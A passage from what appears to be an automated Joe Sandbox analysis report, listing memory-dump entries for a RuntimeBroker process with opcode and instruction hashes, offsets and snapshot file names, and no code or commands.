                                                                                                                                      • Instruction Fuzzy Hash: 5B011A30E4561E8EEBB8DF54C8987E8B6F1EB59341F1542FAD05CD22A1DA741AC48F41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 84df80354a40980ed7238a36ea15a4be09c502b692e4edbb32b51303d0058553
                                                                                                                                      • Instruction ID: 6fcd7e5ec763355a8440d845f9039f514b3bfdbd519fb11f948160f70afc2e74
                                                                                                                                      • Opcode Fuzzy Hash: 84df80354a40980ed7238a36ea15a4be09c502b692e4edbb32b51303d0058553
                                                                                                                                      • Instruction Fuzzy Hash: 3C42AC70A0991D8FDFA8DF58C895AA9B7B2FF98301F1141E9D00DD72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction ID: 88611a6c14a18fce6b6c5543a0fc41ea59210c147374c3482326d47b819cf9e6
                                                                                                                                      • Opcode Fuzzy Hash: 119e34bc25bbe677624d79eefbcfb88dc1046b867057a1c2945ac4154d4572ba
                                                                                                                                      • Instruction Fuzzy Hash: 09D15DB1E1964D8FEB58EB58C8A5BF8B7B1FF58300F4401BAD00D972E2DA346981CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: de887a0734d55986ecddaf625ce94ff98b591df96bc8b4601230073f966cf129
                                                                                                                                      • Instruction ID: cb109a2f1aa1cbc9a09e43acdc995f5d06cfc7eb49215851c1de0c8345f999e5
                                                                                                                                      • Opcode Fuzzy Hash: de887a0734d55986ecddaf625ce94ff98b591df96bc8b4601230073f966cf129
                                                                                                                                      • Instruction Fuzzy Hash: F6E1DC70A0991D8FDFA8DF58C895AA9B7B1FF98300F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 570c67bccf66c45cf218fc04158b7bde5ab87df324fff1a5da30cb3eb3826ad5
                                                                                                                                      • Instruction ID: 864a7eb2702c74e43819b2febe1282d05abdbb8caf7f96eaceaa2415d844f2c9
                                                                                                                                      • Opcode Fuzzy Hash: 570c67bccf66c45cf218fc04158b7bde5ab87df324fff1a5da30cb3eb3826ad5
                                                                                                                                      • Instruction Fuzzy Hash: 22D1D970E0991D8FDFA8DF58C894AA9B7B1FF98301F1141E9D01DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 2ff6240ab3b90d01ef98cb4311e3f666273ebe2efbd0473322adfa638d369d29
                                                                                                                                      • Instruction ID: 960919a96835a0ea53798ec41b97c28acff5806f20bc49d019661205e5afdfa6
                                                                                                                                      • Opcode Fuzzy Hash: 2ff6240ab3b90d01ef98cb4311e3f666273ebe2efbd0473322adfa638d369d29
                                                                                                                                      • Instruction Fuzzy Hash: C1C1DC70E0991D8FDFA8DF58C895AA9B7B1FF98301F1141A9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: e61a615fd47de33443f4fad3e021f4fe5bf0e528628442b7b6edb7321952b346
                                                                                                                                      • Instruction ID: 505ab89cc7352f1225d81dfeef0fca2f67b0d7ece9615f3b51096fd9b5c10313
                                                                                                                                      • Opcode Fuzzy Hash: e61a615fd47de33443f4fad3e021f4fe5bf0e528628442b7b6edb7321952b346
                                                                                                                                      • Instruction Fuzzy Hash: 5CC1DA70A0991D8FDFA8DB58C895BA9B7B1FF98301F1141E9D00DE72A5DA35AE81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 72a5dba4f06b3c4fe523d58c7053edbbd2c89445cba827f69b2c31b4a44013c2
                                                                                                                                      • Instruction ID: 89443927f4e20b23e055443054e124e04193b4e6d73236eabc3eb03d9584c4d3
                                                                                                                                      • Opcode Fuzzy Hash: 72a5dba4f06b3c4fe523d58c7053edbbd2c89445cba827f69b2c31b4a44013c2
                                                                                                                                      • Instruction Fuzzy Hash: 42C1C970A0991D8FDFA8DB58C895BA9B7B1FF98301F1141E9D00DE72A5DA35AA81CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d83191f990166027a91bdb9064529d67cfa3d67ecdb3913ee2dc01579cf42358
                                                                                                                                      • Instruction ID: bd3e0cba6f82c1681f72b18ff27581614cd87426a56003768b3a871fe91a6225
                                                                                                                                      • Opcode Fuzzy Hash: d83191f990166027a91bdb9064529d67cfa3d67ecdb3913ee2dc01579cf42358
                                                                                                                                      • Instruction Fuzzy Hash: 56310A71E1DA8E8FE7229BA8C8212BD7BB1EF45310F060577D465D71E2CA382605C751
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B899000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B899000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b899000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction ID: a41b5f7eb359129346f9df0357e569375c61f8cc0c0d94b2c0beea93d1abd82d
                                                                                                                                      • Opcode Fuzzy Hash: 1d37351a09484cfd75117b9a1b59f7367c0e2378c6ead1a33aa3c455c6adf63e
                                                                                                                                      • Instruction Fuzzy Hash: DC315C31A0F64E8FEB21DBA4C9642ED7BB1FF19300F1105B6E409E61E2DA786E18C755
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction ID: 87b3640d0eb154842936b6571defd6b63e5e68ef3b84a7edec6e99976d692abf
                                                                                                                                      • Opcode Fuzzy Hash: 305dfd4ecfefeb8955909b34684bc1474d4bd13c012df2d66afcb79e2c13d822
                                                                                                                                      • Instruction Fuzzy Hash: DC219F31A1965D8FDF19DF58C8616EDB7B1FB59310F01023AD40AD3291DB78A915CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction ID: 56f8cc8c88a342abc88996c65922bf3588a34b89148783783fbe75b9eb0b88f8
                                                                                                                                      • Opcode Fuzzy Hash: d444e8d6ac81e0fab7bce31c99bcdf4ff1553e20445b1b4158ad4efd1c0a98bc
                                                                                                                                      • Instruction Fuzzy Hash: 9B31B270E15A2E8FEBB5EB54C858BB8B2F5AF58711F4140F9901DA22A5DE795BC0CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b3fae86b66a5c3d719466501dc19b99a46e43983e14a9b7b9c1c49a4f49f324f
                                                                                                                                      • Instruction ID: c13e27a769de9c4770e5d9019624669eb4d842424f6aeae0a2eb8e97d63bfd18
                                                                                                                                      • Opcode Fuzzy Hash: b3fae86b66a5c3d719466501dc19b99a46e43983e14a9b7b9c1c49a4f49f324f
                                                                                                                                      • Instruction Fuzzy Hash: 5621D670E0A50D8FEB68EF94D464BBCB7B1EF5C301F1540AEC01AE36A1CA756A918F04
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d9a54cf703d966f0e8bcf33b5fe55f8ac4b6fdda3d16ce122d1fb0f804903d02
                                                                                                                                      • Instruction ID: 7dd5b607e9a76538546d092a6b5c18eee524e0a7825ba40dd1db2057993752ae
                                                                                                                                      • Opcode Fuzzy Hash: d9a54cf703d966f0e8bcf33b5fe55f8ac4b6fdda3d16ce122d1fb0f804903d02
                                                                                                                                      • Instruction Fuzzy Hash: 69211830A1891E8FDB95EFA8C8A49ADB7F1FF5C301B11057AD019E72A5DF34A980CB40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0eed96b8525e44838fa94a8d12b10764637ce1a4f8cc8d7b21ec54882696646f
                                                                                                                                      • Instruction ID: 4cf3af5b588c8a442b5d1b14a9f4ea50ed4730b38f7b77a8e7f77ca71cd57a76
                                                                                                                                      • Opcode Fuzzy Hash: 0eed96b8525e44838fa94a8d12b10764637ce1a4f8cc8d7b21ec54882696646f
                                                                                                                                      • Instruction Fuzzy Hash: E021F770E1AA2E8BEBB5DB44C8587B8B2B4AF08710F5100F9901DA22A5DE785B859F44
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B886000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B886000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b886000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3a78fa0e7956fe68c79b18fe9bc3ba5f3450692846fa960cc22e49bf1ad942c3
                                                                                                                                      • Instruction ID: 31c1b156c719dda4b815592b4d5bae18cd24671fdbb7f9a543161bfbbb9cc49d
                                                                                                                                      • Opcode Fuzzy Hash: 3a78fa0e7956fe68c79b18fe9bc3ba5f3450692846fa960cc22e49bf1ad942c3
                                                                                                                                      • Instruction Fuzzy Hash: 9B21D670919A2E8BEBA9EB54C8687E8B2B5EB18700F4140F9D01DA26A5DE741BC4CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b880000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7ffd7c902f817cf67017b6804ad2802b83ef1ad89423cd7b70ef3dfa94365f6d
                                                                                                                                      • Instruction ID: 5bcad2d36417e4acf57804fd8a51fc78058f32ef981fe4410ba3c1b97169cc86
                                                                                                                                      • Opcode Fuzzy Hash: 7ffd7c902f817cf67017b6804ad2802b83ef1ad89423cd7b70ef3dfa94365f6d
                                                                                                                                      • Instruction Fuzzy Hash: 04213870A09A1E8FEB60EB18C9986E8B3B1EF58711F0001E9D05DD22A5DE741B818F40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 74538833cb7ec79eacf6f377aa16d629ce8f24b7635502282713a666ab98b47b
                                                                                                                                      • Instruction ID: 0c9d17f9deb7a68100be0d1935eb2a291519735cbe80323f1674b01c8294f7bc
                                                                                                                                      • Opcode Fuzzy Hash: 74538833cb7ec79eacf6f377aa16d629ce8f24b7635502282713a666ab98b47b
                                                                                                                                      • Instruction Fuzzy Hash: FA11F670E0951D8EDBA4EB98C4687FCB7A1EB4D300F50417AD00DE2291CB342AA18F45
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7fd12cc5ec0d0168b22dd9a52701ea8358734ddb26e9c92e6e744e7764f92306
                                                                                                                                      • Instruction ID: 7a6fa9905f4e44543e29366a2969c39baa6a3bf13af353baf42f8cee324a9012
                                                                                                                                      • Opcode Fuzzy Hash: 7fd12cc5ec0d0168b22dd9a52701ea8358734ddb26e9c92e6e744e7764f92306
                                                                                                                                      • Instruction Fuzzy Hash: 84014470A1968C8FCF85EF18C895AD93BF0FF19304F0501AAE848C3261DB34E950CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction ID: f0cd4c5949e007dfb337b2a0df2b9340da400600cc0c9508ea392d2325d53a42
                                                                                                                                      • Opcode Fuzzy Hash: c4b8fa51ff37e57f3634dc13f53e28e0d5192efeb5e579da1f2d2b0ee220b634
                                                                                                                                      • Instruction Fuzzy Hash: 25F06D3050A68DCFCF95DF18C865A9A3FE0FF29340F0501A6E418C75A6D734E9A4CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction ID: c181dff1414412c58870333471d4a10c9ee915101c2f5a4f66a7d5cd1be1f47c
                                                                                                                                      • Opcode Fuzzy Hash: 3c0659d1a750655651227273a03fca603b56d1d7da04e492bf268b4a22c87430
                                                                                                                                      • Instruction Fuzzy Hash: D0F03C3091978D9FDB559F7488685A97FF0FF09204F4544EBD808C61A2D6385554CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b0000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction ID: 327074ae39ff5c3e932352623ea41117dcdd2ccab5956ff2ecde4c4049c9bf0b
                                                                                                                                      • Opcode Fuzzy Hash: caa6d35307d06b2c1fa0d38ecfbe9f4d854c3040b0d389d49aa820faf0bc63eb
                                                                                                                                      • Instruction Fuzzy Hash: CA018C7091D78D8FDB56DF2488A9AA97FF0FF19304F4500EBE808C62A6D6389594CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction ID: dbb5e94b4afeafcadb94eff081683a56e029ed68a3bbbf9b277fee56d2bd1c39
                                                                                                                                      • Opcode Fuzzy Hash: d4a519ccbe55d7512d59d07d1c5206337f08c335b0fa52484f93a5d34e9adfef
                                                                                                                                      • Instruction Fuzzy Hash: 57F0F67190A68D8FEB11BBA048692F87BB0FF15300F4548F7E41CC21E3ED281144C742
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 6ae73db4bf6b6a96de61e4ff7719a198cd2fe491cf4ba757e732caacda1bf8fc
                                                                                                                                      • Instruction ID: 6a3fcdcc118168ab9e8dd50a9bfbf6e80a42500a7384ab483e3bf5d56a6c505f
                                                                                                                                      • Opcode Fuzzy Hash: 6ae73db4bf6b6a96de61e4ff7719a198cd2fe491cf4ba757e732caacda1bf8fc
                                                                                                                                      • Instruction Fuzzy Hash: 7B01C974A0550CCFEB64EF84C494FA8B7B1FF59315F1541AAD419EB2A1CB75A981CF00
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8BF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BF000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8bf000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 15baac038a7630a855ef6539f1f12b4e5ad98d8bb55e05e30c42eaaae26f34ec
                                                                                                                                      • Instruction ID: 85f7531575dca7c3bd9db09259c4ff976bfd249160a2129fb0209f9e4fb18928
                                                                                                                                      • Opcode Fuzzy Hash: 15baac038a7630a855ef6539f1f12b4e5ad98d8bb55e05e30c42eaaae26f34ec
                                                                                                                                      • Instruction Fuzzy Hash: F3F0AF3090978D8FDB51DF24C8595E97FB0FF1A300F0500ABE818C71A6D6389A94CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction ID: 37c4e285f216517c9e48b90ec61dd197cfa2dac02dd6b188a8309e5e7aece153
                                                                                                                                      • Opcode Fuzzy Hash: 7d93440e5048fd3e368c196328a4e992c301f191f9e29bf1829e9d6fff1e251e
                                                                                                                                      • Instruction Fuzzy Hash: 74F08C7194A68D9FDB91ABA488A969D7FB0FF18300F4506BBD448C61A2DA3492948701
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8B7000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B7000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8b7000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction ID: 146f51af0ea56b3cf4e94149412cccdb2974714daba32c4b057c8338e7a27461
                                                                                                                                      • Opcode Fuzzy Hash: ba7a33aac57e6146f5394753ba21e76aaae2599dd1161445d612698430a531f6
                                                                                                                                      • Instruction Fuzzy Hash: 4BF0547191978C9FDB52AF7488686E97FF0FF15200F4604E7E418C71B2DA349654C711
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B894000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B894000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b894000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 28964c90191565b938429371b6e87b66166db17a513587ea009b5e409a222fcb
                                                                                                                                      • Instruction ID: 0780af3514576b6cf5bdcb99d851e067e45723f2029fbc2018b7df116e2f2530
                                                                                                                                      • Opcode Fuzzy Hash: 28964c90191565b938429371b6e87b66166db17a513587ea009b5e409a222fcb
                                                                                                                                      • Instruction Fuzzy Hash: 14F05C70E4D10A9EDB05DF94A4624FDBB60DF46300F204479D81CD31D7DD3412418681
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000016.00000002.2828826279.00007FFD9B8C3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_22_2_7ffd9b8c3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a67941b112c9d8a6a0c7bada7299a4b15c93517f6fcda5a20f751049ebdf6e08
                                                                                                                                      • Instruction ID: 7721ac2f4d3a4d118fecbb5ab40e35074b78e0961862e4c29a003a268da86cdb
